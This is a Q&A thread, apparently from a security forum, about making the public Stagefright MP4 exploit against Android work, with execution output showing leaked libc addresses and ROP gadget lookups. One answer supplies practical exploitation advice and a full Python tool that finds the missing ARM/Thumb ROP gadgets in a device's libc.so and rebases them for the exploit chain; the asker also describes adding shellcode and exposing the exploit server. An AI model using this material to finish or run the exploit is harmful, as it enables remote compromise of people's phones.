4

The exploit is posted here; however, it is missing several things, for example shellcode, and it binds to localhost for exploitation, so I cannot access it from the Android device when it is started on my computer. I modified the two in my version.

To run the exploit I copied the libc.so from Android to the working directory. However, pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc cannot be found. I hardcoded them to 0xffffffff just to see if it runs further. How do I properly get those values? Which libc.so should I use?

Example Execution:

./mp4_stagefright_release.py

[*] memcpy : 0xb6ecdc08
[*] mmap64 : 0xb6ed42ed
b6ecd034:       e280204c        add     r2, r0, #76     ; 0x4c
b6ecd038:       e8927ff0        ldm     r2, {r4, r5, r6, r7, r8, r9, sl, fp, ip, sp, lr}
b6ecd03c:       e33d0000        teq     sp, #0
b6ecd040:       133e0000        teqne   lr, #0
3068973108
[*] stack_pivot : 0xb6ecd034
b6f0f784:       e49df004        pop     {pc}            ; (ldr pc, [sp], #4)
[*] pop_pc : 0xb6f0f784
[*] pop_r0_r1_r2_r3_pc : 0xffffffff
[*] pop_r4_r5_r6_r7_pc : 0xffffffff
b6f1015c:       e59de040        ldr     lr, [sp, #64]   ; 0x40
b6f10160:       e28dd048        add     sp, sp, #72     ; 0x48
b6f10164:       e12fff1e        bx      lr
[17/Sep/2015:22:21:01] ENGINE Listening for SIGHUP.
[17/Sep/2015:22:21:01] ENGINE Listening for SIGTERM.
[17/Sep/2015:22:21:01] ENGINE Listening for SIGUSR1.
[17/Sep/2015:22:21:01] ENGINE Bus STARTING
CherryPy Checker:
The Application mounted at '' has an empty config.

[17/Sep/2015:22:21:01] ENGINE Started monitor thread 'Autoreloader'.
[17/Sep/2015:22:21:01] ENGINE Started monitor thread '_TimeoutMonitor'.
[17/Sep/2015:22:21:02] ENGINE Serving on http://0.0.0.0:8080
[17/Sep/2015:22:21:02] ENGINE Bus STARTED
StackzOfZtuff
dev
  • This type of question isn't really on topic here. It's not a security question - it's a 'sorting out some code/lib' question – Rory Alsop Sep 21 '15 at 17:55
  • @RoryAlsop Making the Google exploit work is definitely a lot more than just 'sorting out some code/lib'. The exploit makes several big assumptions about the heap spray location, the available gadgets in the target Android libc and the libc location. Sorting out those issues to reproduce the exploit is all about exploitation technique. – HoLyVieR Sep 22 '15 at 18:30
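On the two open points in the question (how to get the gadget addresses, and which libc.so to use): the gadget offsets have to come from the libc.so of the target device itself (on a 32-bit device, adb pull /system/lib/libc.so), because the script adds them to the libc base it derives from the leaked memcpy/mmap64 pointers, and a host libc is a different binary for a different architecture. The odd mmap64 address in the output above (0xb6ed42ed) also shows that the target libc is Thumb code, so a search that only knows the ARM (32-bit) encodings of `pop {r0-r3, pc}` and `pop {r4-r7, pc}` can come up empty even when the Thumb forms are present. The script below is an added example, not the original exploit code: it parses the ELF32 program headers, scans only executable segments for both encodings (ARM hits 4-aligned, Thumb hits 2-aligned with bit 0 set in the returned address), and rebases each hit onto a supplied libc base. The sample image it builds, the base address 0xb6e00000 and the function names are constructed for the demo and are not from the original page.

```python
#!/usr/bin/env python3
"""Locate pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc in an ARM32 libc.so.

Added example (not part of the original exploit script). It searches only
executable PT_LOAD segments, matches both the ARM and the Thumb encoding of
each gadget, and converts file offsets into runtime addresses from a libc base.
"""
import struct

EM_ARM = 40
PT_LOAD = 1
PF_X = 1

# Little-endian byte patterns of the two gadgets in both instruction sets.
# ARM:   ldmia sp!, {r0-r3, pc} = 0xE8BD800F   ldmia sp!, {r4-r7, pc} = 0xE8BD80F0
# Thumb: pop {r0-r3, pc}        = 0xBD0F       pop {r4-r7, pc}        = 0xBDF0
GADGETS = {
    "pop_r0_r1_r2_r3_pc": (struct.pack("<I", 0xE8BD800F), struct.pack("<H", 0xBD0F)),
    "pop_r4_r5_r6_r7_pc": (struct.pack("<I", 0xE8BD80F0), struct.pack("<H", 0xBDF0)),
}


def exec_segments(elf):
    """Yield (file_offset, vaddr, size) of every executable PT_LOAD in an ELF32 LE ARM image.

    A 64-bit or non-ARM file (for example the host's own libc) is rejected up front.
    """
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("not a 32-bit little-endian ELF (is this the device's libc.so?)")
    (e_machine,) = struct.unpack_from("<H", elf, 18)
    if e_machine != EM_ARM:
        raise ValueError("not an ARM binary: e_machine=%d" % e_machine)
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        p_type, p_offset, p_vaddr, _paddr, p_filesz, _memsz, p_flags, _align = \
            struct.unpack_from("<8I", elf, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD and p_flags & PF_X:
            yield p_offset, p_vaddr, p_filesz


def _aligned_hits(blob, pattern, align):
    """All offsets of `pattern` in `blob` that are multiples of `align`."""
    pos = blob.find(pattern)
    while pos != -1:
        if pos % align == 0:
            yield pos
        pos = blob.find(pattern, pos + 1)


def find_gadgets(elf, libc_base):
    """Map gadget name -> list of (mode, runtime_address), sorted by address.

    Thumb hits get bit 0 set, which is what a return into Thumb code needs.
    """
    found = {name: [] for name in GADGETS}
    for off, vaddr, size in exec_segments(elf):
        blob = elf[off:off + size]
        for name, (arm_pat, thumb_pat) in GADGETS.items():
            for hit in _aligned_hits(blob, arm_pat, 4):
                found[name].append(("arm", libc_base + vaddr + hit))
            for hit in _aligned_hits(blob, thumb_pat, 2):
                found[name].append(("thumb", libc_base + vaddr + hit + 1))
    for hits in found.values():
        hits.sort(key=lambda h: h[1])
    return found


def build_sample_libc():
    """Constructed stand-in for libc.so: a minimal ELF32 ARM image with one executable
    PT_LOAD (offset 0, vaddr 0) whose code, placed at file offset 0x100, contains:
    ARM pop {r0-r3,pc} at +0x10, ARM pop {r4-r7,pc} at +0x18, Thumb pop {r4-r7,pc}
    at +0x1e, and an unaligned copy of the first gadget at +0x21 that must be ignored.
    """
    code = bytearray(b"\x00\xf0\x20\xe3" * 4)                 # four ARM nops
    code += struct.pack("<I", 0xE8BD800F)                     # ldmia sp!, {r0-r3, pc}
    code += b"\x00\xf0\x20\xe3"                               # nop
    code += struct.pack("<I", 0xE8BD80F0)                     # ldmia sp!, {r4-r7, pc}
    code += struct.pack("<HH", 0x4770, 0xBDF0)                # bx lr ; pop {r4-r7, pc} (Thumb)
    code += b"\x00" + struct.pack("<I", 0xE8BD800F) + b"\x00" * 3   # misaligned decoy
    total = 0x100 + len(code)
    ehdr = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8      # ELFCLASS32, ELFDATA2LSB
    ehdr += struct.pack("<HHIIIIIHHHHHH", 3, EM_ARM, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_LOAD, 0, 0, 0, total, total, 5, 0x1000)  # R+X segment
    image = ehdr + phdr
    return image + b"\x00" * (0x100 - len(image)) + bytes(code)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:            # real use: find_gadgets.py libc.so <libc base in hex>
        with open(sys.argv[1], "rb") as f:
            image = f.read()
        base = int(sys.argv[2], 16)
    else:                             # demo on the constructed sample
        image, base = build_sample_libc(), 0xB6E00000
    for name, hits in find_gadgets(image, base).items():
        shown = ", ".join("%s@0x%08x" % h for h in hits) or "NOT FOUND"
        print("[*] %s : %s" % (name, shown))
```

Run it against the pulled libc.so with the libc base the exploit computes from its leak (the script prints its memcpy and mmap64 addresses, so the base is that address minus the symbol's offset in the same file). If a gadget only shows up as a thumb hit, the odd address is the correct one to put in the chain; if neither encoding is present in that build, the chain has to be rewritten around the gadgets the device's libc actually has.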

1 Answer

0

I'm also dealing with this exploit, trying to make it work; I downloaded it from Exploit DB.

I think the libc.so is from your architecture instead of the Android one, because if you look at the code it uses a 64-bit architecture.

So search your directory for libc.so.

WhiteWinterWolf
jackdirac
  • I think it is 32-bit: when I copy it under Linux from /usr/lib/x86_64-linux-gnu/libc.so it shows an exception; when from /lib32/libc.so.6 it starts to work but cannot find stack_pivot and pop_pc. When I copy it from Android, it finds stack_pivot and pop_pc, but not pop_r0_r1_r2_r3_pc and pop_r4_r5_r6_r7_pc, as I have described in my question. Maybe it helps someone .... – dev Sep 20 '15 at 14:23
  • Hi, do you have any update? Now I think that the right libc.so is from an Android with a 64-bit architecture – jackdirac Sep 22 '15 at 11:51